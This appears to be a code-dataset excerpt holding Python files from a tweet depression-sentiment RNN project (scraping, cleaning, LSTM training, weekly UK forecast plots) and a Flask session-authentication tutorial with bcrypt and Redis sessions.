repo_name
stringclasses
400 values
branch_name
stringclasses
4 values
file_content
stringlengths
16
72.5k
language
stringclasses
1 value
num_lines
int64
1
1.66k
avg_line_length
float64
6
85
max_line_length
int64
9
949
path
stringlengths
5
103
alphanum_fraction
float64
0.29
0.89
alpha_fraction
float64
0.27
0.89
olof98johansson/SentimentAnalysisNLP
refs/heads/main
import torch import torch.nn as nn import preprocessing import os import numpy as np class ModelUtils: ''' A utility class to save and load model weights ''' def save_model(save_path, model): root, ext = os.path.splitext(save_path) if not ext: save_path = root + '.pth' try: torch.save(model.state_dict(), save_path) print(f'Successfully saved to model to "{save_path}"!') except Exception as e: print(f'Unable to save model, check save path!') print(f'Exception:\n{e}') return None def load_model(load_path, model): try: model.load_state_dict(torch.load(load_path)) print(f'Successfully loaded the model from path "{load_path}"') except Exception as e: print(f'Unable to load the weights, check if different model or incorrect path!') print(f'Exception:\n{e}') return None class RNNModel(nn.Module): ''' RNN classifier with different available RNN types (basic RNN, LSTM, GRU) ''' def __init__(self, rnn_type, nr_layers, voc_size, emb_dim, rnn_size, dropout, n_classes): ''' Initiates the RNN model Input: rnn_type - specifies the rnn model type between "rnn", "lstm" or "gru" (type: string) nr_layers - number of rnn layers (type: int) voc_size - size of vocabulary of the encoded input data (type: int) emb_dim - size of embedding layer (type: int) rnn_size - number of hidden layers in RNN model (type: int) dropout - probability of dropout layers (type: float in between [0, 1]) n_classes - number of different classes/labels (type: int) ''' super().__init__() self.rnn_size = rnn_size self.rnn_type = rnn_type self.nr_layers = nr_layers self.embedding = nn.Embedding(voc_size, emb_dim) if self.rnn_type == 'rnn': self.rnn = nn.RNN(input_size=emb_dim, hidden_size=rnn_size, dropout=dropout if nr_layers > 1 else 0, bidirectional=False, num_layers=nr_layers, batch_first=True) elif self.rnn_type == 'lstm': self.rnn = nn.LSTM(input_size=emb_dim, hidden_size=rnn_size, dropout=dropout if nr_layers > 1 else 0, bidirectional=False, num_layers=nr_layers, batch_first=True) elif self.rnn_type == 'gru': self.rnn = nn.GRU(input_size=emb_dim, hidden_size=rnn_size, dropout=dropout if nr_layers > 1 else 0, bidirectional=False, num_layers=nr_layers, batch_first=True) else: print('Invalid or no choice for RNN type, please choose one of "rnn", "lstm" or "gru"') self.dropout = nn.Dropout(dropout) self.linear = nn.Linear(in_features=rnn_size, out_features=n_classes) self.sigmoid = nn.Sigmoid() def forward(self, X, hidden): ''' Forward propagation of the RNN model Input: X - batch of input data (type: torch tensor) hidden - batch of input to the hidden cells (type: torch tensor) Output: out - model prediction (type: torch tensor) hidden - output of the hidden cells (torch.tensor) ''' self.batch_size = X.size(0) embedded = self.embedding(X) if self.rnn_type == 'rnn' or self.rnn_type == 'gru': rnn_out, hidden = self.rnn(embedded, hidden) elif self.rnn_type == 'lstm': rnn_out, hidden = self.rnn(embedded, hidden) else: print(f'Invalid rnn type! Rebuild the model with a correct rnn type!') return None rnn_out = rnn_out.contiguous().view(-1, self.rnn_size) drop = self.dropout(rnn_out) out = self.linear(drop) out = self.sigmoid(out) # reshape such that batch size is first and get labels of last batch out = out.view(self.batch_size, -1) out = out[:, -1] return out, hidden def init_hidden(self, batch_size, device): ''' Initializes hidden state ''' # initialized to zero, for hidden state and cell state of LSTM h0 = torch.zeros((self.nr_layers, batch_size, self.rnn_size)).to(device) c0 = torch.zeros((self.nr_layers, batch_size, self.rnn_size)).to(device) hidden = (h0, c0) return hidden
Python
119
36.705883
113
/models.py
0.58196
0.578396
olof98johansson/SentimentAnalysisNLP
refs/heads/main
import data_cleaning import twint_scraping import os from collections import Counter from sklearn.preprocessing import LabelEncoder from sklearn.model_selection import train_test_split from torch.utils.data import Dataset, DataLoader import torch class config: ''' Configuration class to store and tune global variables ''' PAD = '___PAD___' UNKNOWN = '___UNKNOWN___' paths = ['./training_data/depressive1.json', './training_data/depressive2.json', './training_data/depressive3.json', './training_data/depressive4.json', './training_data/depressive5.json', './training_data/depressive6.json', './training_data/non-depressive1.json', './training_data/non-depressive2.json', './training_data/non-depressive3.json', './training_data/non-depressive4.json', './training_data/non-depressive5.json', './training_data/non-depressive6.json'] labels = ['depressive', 'depressive', 'depressive', 'depressive', 'depressive', 'depressive', 'not-depressive', 'not-depressive', 'not-depressive', 'not-depressive', 'not-depressive', 'not-depressive'] save_path = './training_data/all_training_data.csv' keywords = ['depressed', 'lonely', 'sad', 'depression', 'tired', 'anxious', 'happy', 'joy', 'thankful', 'hope', 'hopeful', 'glad'] nr_of_tweets = [5000, 5000, 5000, 5000, 5000, 5000, 5000, 5000, 5000, 5000, 5000, 5000] hashtags_to_remove = [] encoder = None vocab = None vocab_size = 0 n_classes = 0 def collect_dataset(paths, keywords, nr_of_tweets, hashtags_to_remove, collect=True): ''' Collecting the dataset and cleans the data Input: paths - path to where to save the collected tweets (type: list of strings) keywords - keywords to be used for collecting tweets (type: list of strings) nr_of_tweets - number of tweets to be collected for each collecting process (type: list of ints) collect - specifying if to collect tweets or not (type: boolean) Output: dataset - cleaned dataset of the tweet texts and their labels (type: list if lists) ''' roots, exts = [], [] for path in paths: root, ext = os.path.splitext(path) roots.append(root) exts.append(ext) #roots, exts = [os.path.splitext(path) for path in paths] save_root, save_exts = os.path.splitext(config.save_path) json_paths = [root+'.json' for root in roots] csv_path = save_root+'.csv' if collect: for idx, json_path in enumerate(json_paths): twint_scraping.collect_tweets(keywords=keywords[idx], nr_tweets=nr_of_tweets[idx], output_file=json_path) dataset, keys = data_cleaning.datacleaning(paths=json_paths, labels=config.labels, hashtags_to_remove=hashtags_to_remove, save_path=csv_path) return dataset, keys class DocumentDataset(Dataset): ''' Basic class for creating dataset from the input and label data ''' def __init__(self, X, Y): self.X = X self.Y = Y def __getitem__(self, idx): return self.X[idx], self.Y[idx] def __len__(self): return len(self.X) class DocumentBatcher: ''' Process the batches to desired output by transform into torch tensors and pads uneven input text data to the same length ''' def __init__(self, voc): self.pad = voc.get_pad_idx() def __call__(self, XY): max_len = max(len(x) for x, _ in XY) Xpadded = torch.as_tensor([x + [self.pad] * (max_len - len(x)) for x, _ in XY]) Y = torch.as_tensor([y for _, y in XY]) return Xpadded, Y class Vocab: ''' Encoding the documents ''' def __init__(self): # Splitting the tweets into words as tokenizer self.tokenizer = lambda s: s.split() def build_vocab(self, docs): ''' Building the vocabulary from the documents, i.e creating the word-to-encoding and encoding-to-word dicts Input: docs - list of all the lines in the corpus ''' freqs = Counter(w for doc in docs for w in self.tokenizer(doc)) freqs = sorted(((f, w) for w, f in freqs.items()), reverse=True) self.enc_to_word = [config.PAD, config.UNKNOWN] + [w for _, w in freqs] self.word_to_enc = {w: i for i, w in enumerate(self.enc_to_word)} def encode(self, docs): ''' Encoding the documents Input: docs - list of all the lines in the corpus ''' unkn_index = self.word_to_enc[config.UNKNOWN] return [[self.word_to_enc.get(w, unkn_index) for w in self.tokenizer(doc)] for doc in docs] def get_unknown_idx(self): return self.word_to_enc[config.UNKNOWN] def get_pad_idx(self): return self.word_to_enc[config.PAD] def __len__(self): return len(self.enc_to_word) def preprocess(batch_size=64, collect=True): ''' Function for preprocessing the data which splits the data into train/val, builds the vocabulary, fits the label encoder and creates the dataloaders for the train and validation set Input: batch_size - batch size to be used in the data loaders (type: int) collect - specifying if to collect data or not (type: boolean) Output: dataloaders - the created data loaders for training and validation set (type: list of data loaders) vocab_size - size of the built vocabulary (type: int) n_classes - number of classes/ladels in the dataset ''' data, keys = collect_dataset(paths=config.paths, keywords=config.keywords, nr_of_tweets=config.nr_of_tweets, hashtags_to_remove=config.hashtags_to_remove, collect=collect) X, Y = data x_train, x_val, y_train, y_val = train_test_split(X, Y, test_size=0.2, shuffle=True, random_state=1) vocab = Vocab() vocab.build_vocab(x_train) config.vocab = vocab encoder = LabelEncoder() encoder.fit(y_train) config.encoder = encoder vocab_size = len(vocab) n_classes = len(encoder.classes_) config.vocab_size = vocab_size config.n_classes = n_classes batcher = DocumentBatcher(vocab) train_dataset = DocumentDataset(vocab.encode(x_train), encoder.transform(y_train)) train_loader = DataLoader(train_dataset, batch_size, shuffle=True, collate_fn=batcher, drop_last=True) val_dataset = DocumentDataset(vocab.encode(x_val), encoder.transform(y_val)) val_loader = DataLoader(val_dataset, batch_size, shuffle=True, collate_fn=batcher, drop_last=True) dataloaders = [train_loader, val_loader] return dataloaders, vocab_size, n_classes
Python
197
34.411167
125
/preprocessing.py
0.61566
0.606069
olof98johansson/SentimentAnalysisNLP
refs/heads/main
import models import train import preprocessing import data_cleaning import os import torch import twint_scraping import numpy as np from torch.utils.data import Dataset, DataLoader import matplotlib.pyplot as plt import pandas as pd import seaborn as sns sns.set_style('darkgrid') import pandas_alive class Config: ''' Configuration class to store and tune global variables ''' test_set_keywords = [] test_set_nr_of_tweets = [5000] # Coordinates spread out in UK to cover as wide geographical range as possible test_set_locations = ["54.251186,-4.463196,550km"] len_locations = len(test_set_locations) time_to = twint_scraping.get_weeks([2019, 12, 24], [2020, 3, 17]) # UK lockdown and 3 months back time_from = twint_scraping.get_weeks([2020, 3, 24], [2020, 6, 24]) # UK lockdown and 3 months forward test_set_time_spans = [] for tt in time_to: test_set_time_spans.append(tt) for tf in time_from: test_set_time_spans.append(tf) len_timespan = len(test_set_time_spans) test_set_json_paths = [] for t_idx in range(len_timespan): time_spec_path = [] for l_idx in range(len_locations): time_spec_path.append(f'./forecast_data/testdata_{l_idx}_{t_idx}.json') test_set_json_paths.append(time_spec_path) test_set_csv_paths = [f'./forecast_data/all_loc_{t_idx}.csv' for t_idx in range(len_timespan)] path_to_weights = './weights/lstm_model_2.pth' class TestDataset(Dataset): ''' Basic class for creating dataset from the test input data ''' def __init__(self, X): self.X = X def __getitem__(self, idx): return self.X[idx] def __len__(self): return len(self.X) def get_testdata(paths, save_path, timespans, collect_test_data = False): ''' Builds vocabulary and encoder based on the training data and collects, clean and builds data loaders for the test data Input: paths - path to store the collected test data with json extension (type: list of strings) save_path - path to where to save the cleaned and final test dataset with csv extension (type: list of strings) timespans - timespans of when the collected test tweets where tweeted (type: list of lists of strings) collect_test_data - specifying if to collect test data or not (type: boolean) Output: test_loader - data loader for the collected test data (type: DataLoader) encoder - encoder trained on the training labels (type: LabelEncoder) vocab_size - size of the vocabulary built from the training data (type: int) n_classes: number of classes/labels from the training data (type: int) ''' roots, exts = [], [] for path in paths: root, ext = os.path.splitext(path) roots.append(root) exts.append(ext) save_root, save_exts = os.path.splitext(save_path) json_paths = [root + '.json' for root in roots] csv_path = save_root + '.csv' rnn_params = train.rnn_params() _, vocab_size, n_classes = preprocessing.preprocess(rnn_params.batch_size, collect=False) encoder = preprocessing.config.encoder vocab = preprocessing.config.vocab if collect_test_data: for idx, json_path in enumerate(json_paths): twint_scraping.collect_tweets(nr_tweets=Config.test_set_nr_of_tweets[idx], output_file=json_path, coord=Config.test_set_locations[idx], timespan=timespans) testdata, keys = data_cleaning.datacleaning(paths=json_paths, labels=[], hashtags_to_remove=[], save_path=csv_path, train=False) cleaned_csv_path = save_root + '_cleaned.csv' df = pd.DataFrame(data={"test docs": testdata}) df.to_csv(cleaned_csv_path, sep=',', index=False) pad = vocab.get_pad_idx() max_len = max(len(x) for x in testdata) testdata = vocab.encode(testdata) testdata_padded = torch.as_tensor([x + [pad] * (max_len - len(x)) for x in testdata]) test_dataset = TestDataset(testdata_padded) test_loader = DataLoader(test_dataset, batch_size=1) return test_loader, encoder, vocab_size, n_classes def predict(testdata, path_to_weights, vocab_size, n_classes): ''' Creates, loads and initiates the model and making predictions on the test data Input: testdata - data loader of the test data (type: DataLoader) path_to_weights - relative path and file name of the saved model weights with .pth extension (type:string) vocab_size - size of the vocabulary (type: int) n_classes - number of labels/classes that can be predicted (type: int) Output: preds_prob_list - list of all the probabilities of which the model predicted the corresponding label (type: list of floats) preds_status_list - list of all the reencoded labels that were predicted (type: list of strings) ''' rnn_params = train.rnn_params model = models.RNNModel(rnn_type=rnn_params.rnn_type, nr_layers=rnn_params.nr_layers, voc_size=vocab_size, emb_dim=rnn_params.emb_dim, rnn_size=rnn_params.rnn_size, dropout=rnn_params.dropout, n_classes=n_classes) models.ModelUtils.load_model(path_to_weights, model) model.to(rnn_params.device) batch_size = 1 h = model.init_hidden(batch_size, device=rnn_params.device) model.zero_grad() preds_prob_list, preds_status_list = [], [] for x_test in testdata: x_test = x_test.to(train.rnn_params.device) h = tuple([each.data for each in h]) out, h = model(x_test, h) pred = torch.round(out.squeeze()).item() pred_status = "depressive" if pred < 0.5 else "non-depressive" prob = (1-pred) if pred_status == "depressive" else pred preds_status_list.append(pred_status) preds_prob_list.append(prob) return preds_prob_list, preds_status_list def run_predictions(collect_test_data=False): ''' Collect, preprocess and predicts the test data Input: collect_test_data - weither or not to collect test data (type: boolean) Output: status_results - all the predicted labels (type: dictionary of lists of strings) preds_results - all the predicted values, i.e the certainties of the predictions (type: dictionary of lists of strings) ''' status_results = {} preds_results = {} for idx, ind_paths in enumerate(Config.test_set_json_paths): try: testdata, encoder, vocab_size, n_classes = get_testdata(ind_paths, Config.test_set_csv_paths[idx], timespans=Config.test_set_time_spans[idx], collect_test_data=collect_test_data) preds_list, preds_status_list = predict(testdata, Config.path_to_weights, vocab_size, n_classes) status_results[f'timespan_{idx}'] = preds_status_list preds_results[f'timespan_{idx}'] = preds_list except Exception as e: print(f'Unable to get test data!') print(f'Exception:\n{e}') return None return status_results, preds_results def plot_predictions(status_results, preds_results, save_name='./predictions_forecast.png', color=None): ''' Plot the predictions in time order, i.e a time-based forecast of the predictions Input: status_results - all the predicted labels (type: dictionary of lists of strings) preds_results - all the predicted values, i.e the certainties of the predictions (type: dictionary of lists of strings) save_name - path and filename to where to save the forecasting plot ''' timespans = list(status_results.keys()) nr_depressive = [(np.array(status_results[timespans[t_idx]]) == 'depressive').sum() for t_idx in range(len(timespans))] percentage_dep = [((np.array(status_results[timespans[t_idx]]) == 'depressive').sum())/len(status_results[timespans[t_idx]]) for t_idx in range(len(timespans))] text_perc_dep = [format(percentage_dep[i]*100, '.2f') for i in range(len(percentage_dep))] ave_probs = [np.mean(np.array(preds_results[timespans[t_idx]])) for t_idx in range(len(timespans))] text_ave_probs = [format(ave_probs[i]*100, '.2f') for i in range(len(ave_probs))] weeks = Config.test_set_time_spans indexes = [f'{w[0].split()[0]}\n{w[1].split()[0]}' for w in weeks] if color: color_bar = color else: color_bar = "#ff3399" if not len(indexes) == len(percentage_dep): print('Time indexes does not equal number of values') indexes = timespans fig = plt.figure(figsize=(28, 12)) plt.bar(indexes, percentage_dep, color=color_bar, width=0.55, alpha=0.35) plt.plot(indexes, percentage_dep, color="#cc99ff", alpha=0.5) for i, p in enumerate(percentage_dep): plt.text(indexes[i], p + 0.02, f'{text_perc_dep[i]}%', verticalalignment='center', color='black', horizontalalignment='center', fontweight='bold', fontsize=8) # plt.text(timespans[i], p+0.005, f'Average target prob: {text_ave_probs[i]}%', verticalalignment='center', # horizontalalignment='center', color='black', fontweight='bold', fontsize=8) plt.xlabel('Time period', fontsize=16) plt.ylabel('Percentage %', fontsize=16) plt.ylim(-0.05, 0.5) plt.xticks(fontsize=7.4) plt.yticks(fontsize=11) plt.title(f'Percentage of depressive tweets weekly from {indexes[0].split()[0]} to {indexes[len(indexes)-1].split()[1]}', fontsize=20) if save_name: root, ext = os.path.splitext(save_name) save_name = root + '.png' plt.savefig(save_name, bbox_inches='tight') plt.show() def plot_all_predictions(status_results1, status_results2, status_results3, weeks, save_name='./predictions_forecast.png', colors=None): timespans1 = list(status_results1.keys()) timespans2 = list(status_results2.keys()) timespans3 = list(status_results3.keys()) percentage_dep1 = [((np.array(status_results1[timespans1[t_idx]]) == 'depressive').sum())/len(status_results1[timespans1[t_idx]]) for t_idx in range(len(timespans1))] percentage_dep2 = [((np.array(status_results2[timespans2[t_idx]]) == 'depressive').sum())/len(status_results2[timespans2[t_idx]]) for t_idx in range(len(timespans2))] percentage_dep3 = [((np.array(status_results3[timespans3[t_idx]]) == 'depressive').sum())/len(status_results3[timespans3[t_idx]]) for t_idx in range(len(timespans3))] weeks1, weeks2, weeks3 = weeks indexes1 = [f'{w[0].split()[0]}\n{w[1].split()[0]}' for w in weeks1] indexes2 = [f'{w[0].split()[0]}\n{w[1].split()[0]}' for w in weeks2] indexes3 = [f'{w[0].split()[0]}\n{w[1].split()[0]}' for w in weeks3] x = np.arange(len(indexes1)) lengths = [len(indexes1), len(indexes2), len(indexes3)] if not all(l == lengths[0] for l in lengths): shortest = np.min(lengths) percentage_dep1 = percentage_dep1[:shortest] percentage_dep2 = percentage_dep2[:shortest] percentage_dep3 = percentage_dep3[:shortest] x = np.arange(shortest) fig = plt.figure(figsize=(28, 12)) plt.bar(x-0.2, percentage_dep1, color=colors[0], width=0.2, alpha=0.4, label=f'{indexes1[0].split()[0]} to {indexes1[len(indexes1)-1].split()[1]}') plt.bar(x, percentage_dep2, color=colors[1], width=0.2, alpha=0.4, label=f'{indexes2[0].split()[0]} to {indexes2[len(indexes2) - 1].split()[1]}') plt.bar(x+0.2, percentage_dep3, color=colors[2], width=0.2, alpha=0.4, label=f'{indexes3[0].split()[0]} to {indexes3[len(indexes3) - 1].split()[1]}') plt.xlabel('Time periods', fontsize=16) plt.ylabel('Percentage %', fontsize=16) plt.ylim(-0.05, 0.5) plt.yticks(fontsize=12) plt.tick_params( axis='x', # changes apply to the x-axis which='both', # both major and minor ticks are affected bottom=False, # ticks along the bottom edge are off top=False, # ticks along the top edge are off labelbottom=False) plt.legend(fontsize=21) plt.title(f'Comparison of the percentage of depressive tweets weekly from for different time periods', fontsize=20) if save_name: root, ext = os.path.splitext(save_name) save_name = root + '.png' plt.savefig(save_name, bbox_inches='tight') plt.show() def forecast_bar_race(status_results, preds_results, save_name='./plots/forecast_bar_race.mp4'): timespans = list(status_results.keys()) nr_depressive = [(np.array(status_results[timespans[t_idx]]) == 'depressive').sum() for t_idx in range(len(timespans))] nr_nondepressive = [(np.array(status_results[timespans[t_idx]]) == 'non-depressive').sum() for t_idx in range(len(timespans))] percentage_dep = [ ((np.array(status_results[timespans[t_idx]]) == 'depressive').sum()) / len(status_results[timespans[t_idx]]) for t_idx in range(len(timespans))] text_perc_dep = [format(percentage_dep[i] * 100, '.2f') for i in range(len(percentage_dep))] ave_probs = [np.mean(np.array(preds_results[timespans[t_idx]])) for t_idx in range(len(timespans))] text_ave_probs = [format(ave_probs[i] * 100, '.2f') for i in range(len(ave_probs))] percentage_antidep = [1 - percentage_dep[i] for i in range(len(percentage_dep))] df_dict = {'depressive': percentage_dep, 'non-depressive': percentage_antidep} weeks = Config.test_set_time_spans indexes = [f'{w[0].split()[0]}' for w in weeks] predictions_df = pd.DataFrame(df_dict, index=pd.DatetimeIndex(indexes)) predictions_df.index.rename('date', inplace=True) root, ext = os.path.splitext(save_name) save_name = root + '.gif' save_name_pie = root + '.gif' #predictions_df.plot_animated(filename=save_name, period_fmt="%Y-%m-%d") predictions_df.plot_animated(filename=save_name_pie, period_fmt="%Y-%m-%d", period_label={'x': 0, 'y': 0.05}, title= f'Weekly ratio between non-depressive and depressive tweets in the UK', kind="pie", rotatelabels=True) def run(): ''' Predict function to run the prediction process after specifying parameters for all three time periods ''' preprocessing.config.paths = ['./training_data/depressive1.json', './training_data/depressive2.json', './training_data/depressive3.json', './training_data/depressive4.json', './training_data/depressive5.json', './training_data/depressive6.json', './training_data/non-depressive1.json', './training_data/non-depressive2.json', './training_data/non-depressive3.json', './training_data/non-depressive4.json', './training_data/non-depressive5.json', './training_data/non-depressive6.json'] preprocessing.config.labels = ['depressive', 'depressive', 'depressive', 'depressive', 'depressive', 'depressive', 'not-depressive', 'not-depressive', 'not-depressive', 'not-depressive', 'not-depressive', 'not-depressive'] preprocessing.config.save_path = './training_data/all_training_data.csv' status_results, preds_results = run_predictions(collect_test_data=True) # collect_test_data=False if already collected plot_predictions(status_results, preds_results, save_name='./plots/forecast_orig.png') forecast_bar_race(status_results, preds_results, save_name='./plots/forecast_bar_race_orig.gif') week1 = Config.test_set_time_spans # comparing to same period year before Config.time_to = twint_scraping.get_weeks([2018, 12, 24], [2019, 3, 24]) Config.time_from = twint_scraping.get_weeks([2019, 3, 24], [2019, 6, 24]) test_set_time_spans = [] for tt in Config.time_to: test_set_time_spans.append(tt) for tf in Config.time_from: test_set_time_spans.append(tf) len_timespan = len(test_set_time_spans) Config.test_set_time_spans = test_set_time_spans Config.len_timespan = len_timespan test_set_json_paths = [] for t_idx in range(len_timespan): time_spec_path = [] for l_idx in range(Config.len_locations): time_spec_path.append(f'./forecast_data/testdata_yearbefore_{l_idx}_{t_idx}.json') test_set_json_paths.append(time_spec_path) Config.test_set_json_paths = test_set_json_paths Config.test_set_csv_paths = [f'./forecast_data/all_loc_year_before_{t_idx}.csv' for t_idx in range(len_timespan)] week2 = Config.test_set_time_spans status_results_before, preds_results_before = run_predictions(collect_test_data=True) # collect_test_data=False if already collected plot_predictions(status_results_before, preds_results_before, save_name='./plots/forecast_year_before.png', color="#3366ff") forecast_bar_race(status_results_before, preds_results_before, save_name='./plots/forecast_bar_race_last_year.gif') # Comparing to from 3 months after lockdown to recent Config.time_to = twint_scraping.get_weeks([2020, 6, 24], [2020, 9, 24]) Config.time_from = twint_scraping.get_weeks([2020, 9, 24], [2020, 12, 17]) test_set_time_spans = [] for tt in Config.time_to: test_set_time_spans.append(tt) for tf in Config.time_from: test_set_time_spans.append(tf) len_timespan = len(test_set_time_spans) Config.test_set_time_spans = test_set_time_spans Config.len_timespan = len_timespan test_set_json_paths = [] for t_idx in range(len_timespan): time_spec_path = [] for l_idx in range(Config.len_locations): time_spec_path.append(f'./forecast_data/testdata_uptorecent_{l_idx}_{t_idx}.json') test_set_json_paths.append(time_spec_path) Config.test_set_json_paths = test_set_json_paths Config.test_set_csv_paths = [f'./forecast_data/all_loc_up_to_recent_{t_idx}.csv' for t_idx in range(len_timespan)] week3 = Config.test_set_time_spans status_results_uptonow, preds_results_uptonow = run_predictions(collect_test_data=True) # collect_test_data=False if already collected plot_predictions(status_results_uptonow, preds_results_uptonow, save_name='./plots/forecast_up_to_now.png', color="#00cc66") forecast_bar_race(status_results_uptonow, preds_results_uptonow, save_name='./plots/forecast_bar_race_up_to_now.gif') ##### COMPARISON ##### weeks = [week1, week2, week3] colors = ["#ff3399", "#3366ff", "#00cc66"] plot_all_predictions(status_results, status_results_before, status_results_uptonow, weeks, save_name='./plots/comparison.png', colors=colors) run()
Python
410
46.358536
170
/predict.py
0.629879
0.611803
olof98johansson/SentimentAnalysisNLP
refs/heads/main
import json import csv import re def load_json(path): ''' Loads collected data in json format, checks it and then converts to csv format Input: path - path and file name to the collected json data (type: string) Output: keys - list of features/keys of the dataframe (type: list of strings) df_list - list containing all the dataframes from the json data (type: list of dataframes) ''' if not path.endswith('.json'): print('File path not JSON file...') return None with open(path, 'r', encoding='utf8') as handle: df_list = [json.loads(line) for line in handle] nr_keys = [len(df_list[i].keys()) for i in range(len(df_list))] if not all(k == nr_keys[0] for k in nr_keys): print('Some features missing, review the data!') return None else: keys = df_list[0].keys() return keys, df_list def combine_and_label(paths, labels, train=True): ''' Combining multiple collections of data files and adds corresponding label (i.e depressive or non-depressive). List of labels in correct order with respect to the paths order must be specified manually Input: paths - list containing all the paths to the json files (type: list of strings) labels - list containing all the labels to the corresponding json files (type: list of strings) Output: df_list - list of all the combined dataframes from the json data (type: list of dataframes) ''' if not type(paths)==type(list()): print('"paths" argument is not of type list! Please pass list of the paths to the collected data to be combined!') return None if train: if not len(paths) == len(labels): print(f'Number of datafile paths of {len(paths)} is not the same as number of labels of {len(labels)}!') return None df_list = [] for idx, path in enumerate(paths): try: curr_keys, curr_df_list = load_json(path) except Exception as e: print(f'Unable to load data from path "{path}", check path name and file!') print(f'Exception:\n{e}') return None for df in curr_df_list: if train: df['label'] = labels[idx] df_list.append(df) return df_list def datacleaning(paths, labels, hashtags_to_remove = [], save_path=None, train=True): ''' Cleans the data based on unwanted hashtags, duplication of tweets occured due to sharing of keywords, removal of mentions, urls, non-english alphabetic tokens and empty tweets obtained after cleaning Input: paths - list containing all the paths to the json files (type: list of strings) labels - list containing all the labels to the corresponding json files (type: list of strings) hashtags_to_remove - list containing hashtags wished to be removed (type: list of strings) save_path - path and file name to were to save the cleaned dataset (type: string or None) train - specify if it is training mode or not, i.e if to use labels or not (type: boolean) Output: dataset_doc - list of all the text documents and corresponding labels if train (type: list of strings) keys - list of features/keys of the dataframe (type: list of strings) ''' if len(labels) > 0: train = True df_list = combine_and_label(paths, labels, train=train) # Remove tweets with specific hashtags nr_removed_tweets = 0 for idx, df in enumerate(df_list): hashtags = df.copy()['hashtags'] if any([h in hashtags_to_remove for h in hashtags]): df_list.pop(idx) print(f'Tweet nr {idx} removed!') nr_removed_tweets += 1 print(f'Removed total of {nr_removed_tweets} tweets') # Removes duplicate of tweets unique_ids = {} for idx, df in enumerate(df_list): tweet_id = df.copy()['id'] if not tweet_id in unique_ids: unique_ids[str(tweet_id)] = 1 else: print('Found douplicate of tweet id, removing the duplicate!') df_list.pop(idx) # Cleaning the tweet texts for idx, df in enumerate(df_list): tweet = df.copy()['tweet'] # Removing URLs tweet = re.sub(r"http\S+", " ", tweet) tweet = re.sub(r"\S+\.com\S", " ", tweet) # Remove mentions tweet = re.sub(r'\@\w+', ' ', tweet) # Remove non-alphabetic tokens tweet = re.sub('[^A-Za-z]', ' ', tweet.lower()) # Remove double spacings tweet = re.sub(' +', ' ', tweet) # Remove from dataset if tweet empty after cleaning if tweet == 0: df_list.pop(idx) else: df['tweet'] = tweet print('Successfully cleaned data!') # Saving list of tweet dicts to csv format if save_path: print(f'Saving data...') if not save_path.endswith('.csv'): print('Save path is missing .csv format extension!') save_path = save_path + '.csv' try: with open(save_path, 'w', encoding='utf8', newline='') as output_file: csv_file = csv.DictWriter(output_file, fieldnames=df_list[0].keys(), ) csv_file.writeheader() csv_file.writerows(df_list) print(f'Data succesfully saved to "{save_path}"') except Exception as e: print(f'Unable to save data to "{save_path}", check the path and data!') print(f'Exception:\n{e}') dataset_docs = [df['tweet'] for df in df_list] keys = df_list[0].keys() if train: dataset_labels = [df['label'] for df in df_list] return [dataset_docs, dataset_labels], keys else: return dataset_docs, keys
Python
162
35.339508
122
/data_cleaning.py
0.598675
0.596807
Guilherme99/flask-react-session-authenticaton-tutorial
refs/heads/master
from dotenv import load_dotenv import os import redis load_dotenv() class ApplicationConfig: SECRET_KEY = os.environ["SECRET_KEY"] SQLALCHEMY_TRACK_MODIFICATIONS = False SQLALCHEMY_ECHO = True SQLALCHEMY_DATABASE_URI = r"sqlite:///./db.sqlite" SESSION_TYPE = "redis" SESSION_PERMANENT = False SESSION_USE_SIGNER = True SESSION_REDIS = redis.from_url("redis://127.0.0.1:6379")
Python
17
23.235294
60
/server/config.py
0.698297
0.673966
Guilherme99/flask-react-session-authenticaton-tutorial
refs/heads/master
from flask import Flask, request, jsonify, session from flask_bcrypt import Bcrypt from flask_cors import CORS, cross_origin from flask_session import Session from config import ApplicationConfig from models import db, User app = Flask(__name__) app.config.from_object(ApplicationConfig) bcrypt = Bcrypt(app) CORS(app, supports_credentials=True) server_session = Session(app) db.init_app(app) with app.app_context(): db.create_all() @app.route("/@me") def get_current_user(): user_id = session.get("user_id") if not user_id: return jsonify({"error": "Unauthorized"}), 401 user = User.query.filter_by(id=user_id).first() return jsonify({ "id": user.id, "email": user.email }) @app.route("/register", methods=["POST"]) def register_user(): email = request.json["email"] password = request.json["password"] user_exists = User.query.filter_by(email=email).first() is not None if user_exists: return jsonify({"error": "User already exists"}), 409 hashed_password = bcrypt.generate_password_hash(password) new_user = User(email=email, password=hashed_password) db.session.add(new_user) db.session.commit() session["user_id"] = new_user.id return jsonify({ "id": new_user.id, "email": new_user.email }) @app.route("/login", methods=["POST"]) def login_user(): email = request.json["email"] password = request.json["password"] user = User.query.filter_by(email=email).first() if user is None: return jsonify({"error": "Unauthorized"}), 401 if not bcrypt.check_password_hash(user.password, password): return jsonify({"error": "Unauthorized"}), 401 session["user_id"] = user.id return jsonify({ "id": user.id, "email": user.email }) @app.route("/logout", methods=["POST"]) def logout_user(): session.pop("user_id") return "200" if __name__ == "__main__": app.run(debug=True)
Python
80
23.875
71
/server/app.py
0.639015
0.631473
Guilherme99/flask-react-session-authenticaton-tutorial
refs/heads/master
from flask_sqlalchemy import SQLAlchemy from uuid import uuid4 db = SQLAlchemy() def get_uuid(): return uuid4().hex class User(db.Model): __tablename__ = "users" id = db.Column(db.String(32), primary_key=True, unique=True, default=get_uuid) email = db.Column(db.String(345), unique=True) password = db.Column(db.Text, nullable=False)
Python
13
26.461538
82
/server/models.py
0.691877
0.672269
EricHughesABC/T2EPGviewer
refs/heads/master
